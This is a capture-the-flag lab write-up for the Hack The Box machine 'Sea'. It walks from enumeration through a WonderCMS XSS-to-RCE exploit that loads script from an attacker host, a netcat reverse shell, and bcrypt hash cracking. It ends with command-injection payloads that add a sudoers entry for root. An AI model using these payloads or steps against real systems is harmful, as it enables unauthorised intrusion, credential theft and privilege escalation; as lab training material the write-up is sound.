HTB Sea done
Sea
OS:
Linux
Technology:
WonderCMS version 3.2.0
IP Address:
10.129.138.250
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and pass:
/etc/passwd
amay
geo
---
SSH login - amay
L: amay
P: mychemicalromance
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ sudo nmap -A -sV --script=default -p- -oA IP_nmap 10.129.138.250 ; cat 10.129.138.250_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 14:34 UTC
Nmap scan report for sea.htb (10.129.138.250)
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Sea - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/14%OT=22%CT=1%CU=37468%PV=Y%DS=2%DC=T%G=Y%TM=673
OS:60AC8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%TS=A)SEQ(SP=10
OS:5%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53C
OS:NNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W
OS:3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=N)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNN
OS:SNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 29.14 ms 10.10.14.1
2 29.48 ms sea.htb (10.129.138.250)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
cat: 10.129.138.250_nmap.nmap: No such file or directory
Add IP to hostname
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ cat /etc/hosts | grep sea
10.129.138.250 sea.htb
Ffuz
──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ffuf -u http://10.129.138.250/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.138.250_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.138.250/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.138.250_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
0 [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 35ms]
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 34ms]
contact.php [Status: 200, Size: 2731, Words: 821, Lines: 119, Duration: 34ms]
data [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 38ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/data/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 48ms]
index.php [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 47ms]
messages [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 46ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/messages/FUZZ
plugins [Status: 301, Size: 238, Words: 14, Lines: 8, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/plugins/FUZZ
themes [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 35ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/themes/FUZZ
[INFO] Starting queued job on target: http://10.129.138.250/data/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 33ms]
files [Status: 301, Size: 241, Words: 14, Lines: 8, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/data/files/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 34ms]
[INFO] Starting queued job on target: http://10.129.138.250/messages/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 54ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 48ms]
[INFO] Starting queued job on target: http://10.129.138.250/plugins/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 41ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 55ms]
[INFO] Starting queued job on target: http://10.129.138.250/themes/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 33ms]
bike [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 41ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/themes/bike/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 32ms]
[INFO] Starting queued job on target: http://10.129.138.250/data/files/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 40ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 35ms]
[INFO] Starting queued job on target: http://10.129.138.250/themes/bike/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 36ms]
LICENSE [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 46ms]
README.md [Status: 200, Size: 318, Words: 40, Lines: 16, Duration: 37ms]
css [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.138.250/themes/bike/css/
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 38ms]
img [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.138.250/themes/bike/img/
summary [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 41ms]
theme.php [Status: 500, Size: 227, Words: 37, Lines: 9, Duration: 31ms]
version [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 34ms]
:: Progress: [143283/143283] :: Job [7/7] :: 847 req/sec :: Duration: [0:02:31] :: Errors: 0 ::
──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ffuf -u http://10.129.138.250/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.138.250_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.138.250/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.138.250_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
0 [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 35ms]
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 34ms]
contact.php [Status: 200, Size: 2731, Words: 821, Lines: 119, Duration: 34ms]
data [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 38ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/data/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 48ms]
index.php [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 47ms]
messages [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 46ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/messages/FUZZ
plugins [Status: 301, Size: 238, Words: 14, Lines: 8, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/plugins/FUZZ
themes [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 35ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/themes/FUZZ
[INFO] Starting queued job on target: http://10.129.138.250/data/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 33ms]
files [Status: 301, Size: 241, Words: 14, Lines: 8, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/data/files/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 34ms]
[INFO] Starting queued job on target: http://10.129.138.250/messages/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 54ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 48ms]
[INFO] Starting queued job on target: http://10.129.138.250/plugins/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 41ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 55ms]
[INFO] Starting queued job on target: http://10.129.138.250/themes/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 33ms]
bike [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 41ms]
[INFO] Adding a new job to the queue: http://10.129.138.250/themes/bike/FUZZ
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 32ms]
[INFO] Starting queued job on target: http://10.129.138.250/data/files/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 40ms]
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 35ms]
[INFO] Starting queued job on target: http://10.129.138.250/themes/bike/FUZZ
404 [Status: 200, Size: 3376, Words: 530, Lines: 85, Duration: 36ms]
LICENSE [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 46ms]
README.md [Status: 200, Size: 318, Words: 40, Lines: 16, Duration: 37ms]
css [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.138.250/themes/bike/css/
home [Status: 200, Size: 3685, Words: 582, Lines: 87, Duration: 38ms]
img [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.138.250/themes/bike/img/
summary [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 41ms]
theme.php [Status: 500, Size: 227, Words: 37, Lines: 9, Duration: 31ms]
version [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 34ms]
:: Progress: [143283/143283] :: Job [7/7] :: 847 req/sec :: Duration: [0:02:31] :: Errors: 0 ::
Find version of CMS: WonderCMS v 3.2.0
After reading deep hidden file I found version of CMS:
WonderCMS version 3.2.0
---
http://sea.htb/themes/bike/README.md
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview
## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
___
http://sea.htb/themes/bike/version
3.2.0
___
http://sea.htb/themes/bike/LICENSE
MIT License
Copyright (c) 2019 turboblack
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Exploit: CVE-2023-41425-RCE for WonderCMS versions v3.2.0 to v3.4.2
https://github.com/insomnia-jacob/CVE-2023-41425
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ git clone https://github.com/insomnia-jacob/CVE-2023-41425
Cloning into 'CVE-2023-41425'...
remote: Enumerating objects: 41, done.
remote: Counting objects: 100% (41/41), done.
remote: Compressing objects: 100% (37/37), done.
remote: Total 41 (delta 8), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (41/41), 207.19 KiB | 1.92 MiB/s, done.
Resolving deltas: 100% (8/8), done.
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Sea/CVE-2023-41425]
└─$ python3 exploit.py -u http://sea.htb/loginURL -i 10.10.14.117 -r http://10.10.14.117:8000/main.zip
usage: exploit.py [-h] -u URL -i IP -p PORT [-r REMOTE_HOST]
exploit.py: error: the following arguments are required: -p/--port
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Sea/CVE-2023-41425]
└─$ python3 exploit.py -u http://sea.htb/loginURL -i 10.10.14.117 -p 1234 -r http://10.10.14.117:8000/main.zip
================================================================
# Autor : Insomnia (Jacob S.)
# IG : insomnia.py
# X : @insomniadev_
# Github : https://github.com/insomnia-jacob
================================================================
[+]The zip file will be downloaded from the host: http://10.10.14.117:8000/main.zip
[+] File created: xss.js
[+] Set up nc to listen on your terminal for the reverse shell
Use:
nc -nvlp 1234
[+] Send the below link to admin:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.117:8000/xss.js"></script><form+action="
Starting HTTP server with Python3, waiting for the XSS request
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.199.242 - - [15/Nov/2024 11:53:40] "GET /xss.js HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
10.129.199.242 - - [15/Nov/2024 11:53:48] "GET /main.zip HTTP/1.1" 200 -
Revshell
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.117] from (UNKNOWN) [10.129.199.242] 42230
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
11:53:48 up 13:29, 0 users, load average: 0.95, 1.03, 1.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ echo $SHELL
$ script /dev/null -c /bin/bash
Script started, file is /dev/null
www-data@sea:/$
www-data@sea:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sea:/$
Find hash in file: database.js
Read file: /var/www/sea/data/database.js
I found interesing row with hash
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
---
ww-data@sea:/var/www/sea/data$ cat database.js
cat database.js
{
"config": {
"siteTitle": "Sea",
"theme": "bike",
"defaultPage": "home",
"login": "loginURL",
"forceLogout": false,
"forceHttps": false,
"saveChangesPopup": false,
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
"lastLogins": {
"2024\/11\/15 11:53:40": "127.0.0.1",
"2024\/11\/15 11:48:10": "127.0.0.1",
"2024\/11\/15 11:45:39": "127.0.0.1",
"2024\/11\/15 11:41:09": "127.0.0.1",
"2024\/11\/15 11:39:39": "127.0.0.1"
},
"lastModulesSync": "2024\/11\/15",
"customModules": {
"themes": {},
"plugins": {}
},
"menuItems": {
"0": {
"name": "Home",
"slug": "home",
"visibility": "show",
"subpages": {}
},
"1": {
"name": "How to participate",
"slug": "how-to-participate",
"visibility": "show",
"subpages": {}
}
},
"logoutToLoginScreen": {}
},
"pages": {
"404": {
"title": "404",
"keywords": "404",
"description": "404",
"content": "<center><h1>404 - Page not found<\/h1><\/center>",
"subpages": {}
},
"home": {
"title": "Home",
"keywords": "Enter, page, keywords, for, search, engines",
"description": "A page description is also good for search engines.",
"content": "<h1>Welcome to Sea<\/h1>\n\n<p>Hello! Join us for an exciting night biking adventure! We are a new company that organizes bike competitions during the night and we offer prizes for the first three places! The most important thing is to have fun, join us now!<\/p>",
"subpages": {}
},
"how-to-participate": {
"title": "How to",
"keywords": "Enter, keywords, for, this page",
"description": "A page description is also good for search engines.",
"content": "<h1>How can I participate?<\/h1>\n<p>To participate, you only need to send your data as a participant through <a href=\"http:\/\/sea.htb\/contact.php\">contact<\/a>. Simply enter your name, email, age and country. In addition, you can optionally add your website related to your passion for night racing.<\/p>",
"subpages": {}
}
},
"blocks": {
"subside": {
"content": "<h2>About<\/h2>\n\n<br>\n<p>We are a company dedicated to organizing races on an international level. Our main focus is to ensure that our competitors enjoy an exciting night out on the bike while participating in our events.<\/p>"
},
"footer": {
"content": "©2024 Sea"
}
}
}www-data@sea:/var/www/sea/data$
Cracking hash
We have to remove backslash from file
From
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q
To
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ john database.js --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:23 DONE (2024-11-15 12:39) 0.04189g/s 128.1p/s 128.1c/s 128.1C/s iamcool..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ cat database.js
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
SSH login - amay
L: amay
P: mychemicalromance
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ssh [email protected]
The authenticity of host 'sea.htb (10.129.199.242)' can't be established.
ED25519 key fingerprint is SHA256:xC5wFVdcixOCmr5pOw8Tm4AajGSMT3j5Q4wL6/ZQg7A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sea.htb' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 15 Nov 2024 12:40:28 PM UTC
System load: 1.77 Processes: 252
Usage of /: 67.9% of 6.51GB Users logged in: 0
Memory usage: 11% IPv4 address for eth0: 10.129.199.242
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Aug 5 07:16:49 2024 from 10.10.14.40
Read flag: user.txt
amay@sea:~$ cd ~
amay@sea:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .ssh user.txt
amay@sea:~$ cat user.txt
759f924468736b9b92e06938d8c86b18
amay@sea:~$
Privilege Escalation
List of running services on remote host
amay@sea:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:48609 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
amay@sea:~$ curl http://127.0.0.1:8080
Unauthorized accessamay@sea:~$
amay@sea:~$
amay@sea:~$ curl -u "amay:mychemicalromance" -I http://127.0.0.1:8080
HTTP/1.1 200 OK
Host: 127.0.0.1:8080
Date: Fri, 15 Nov 2024 13:13:04 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.23
Content-type: text/html; charset=UTF-8
Create SSH tunnel
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ssh -N -L 8081:localhost:8080 [email protected]
[email protected]'s password:
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
└─$ ss -tulpn | grep 8081
tcp LISTEN 0 128 127.0.0.1:8081 0.0.0.0:* users:(("ssh",pid=303550,fd=5))
tcp LISTEN 0 128 [::1]:8081 [::]:* users:(("ssh",pid=303550,fd=4))
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sea]
Open website: http://127.0.0.1:8081/
Open website: http://127.0.0.1:8081/
Command injection
Payload: log_file=/etc/shadow+%26%26+id%26+id&analyze_log=
---
POST / HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8081/
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://127.0.0.1:8081
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
log_file=/etc/shadow+%26%26+id%26+id&analyze_log=
Add user amay to /etc/sudoers
Payload: log_file=/etc/shadow+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#&analyze_log=
---
POST / HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8081/
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://127.0.0.1:8081
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
log_file=/etc/shadow+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#&analyze_log=
Read flag: root.txt
amay@sea:~$ sudo -l
Matching Defaults entries for amay on sea:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User amay may run the following commands on sea:
(ALL) NOPASSWD: ALL
amay@sea:~$
amay@sea:~$ sudo -i
root@sea:~#
root@sea:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sea:~# cd /root
root@sea:~#
root@sea:~# ls -a
. .bash_history .cache .pki root.txt .ssh
.. .bashrc monitoring .profile scripts .viminfo
root@sea:~# cat root.txt
4caa4aa524beda44cf5c49077a7d9fe1
root@sea:~#
References
[CVE-2023-41425 - RCE for WonderCMS versions v3.2.0 to v3.4.2]( https://github.com/insomnia-jacob/CVE-2023-41425)
Lessons Learned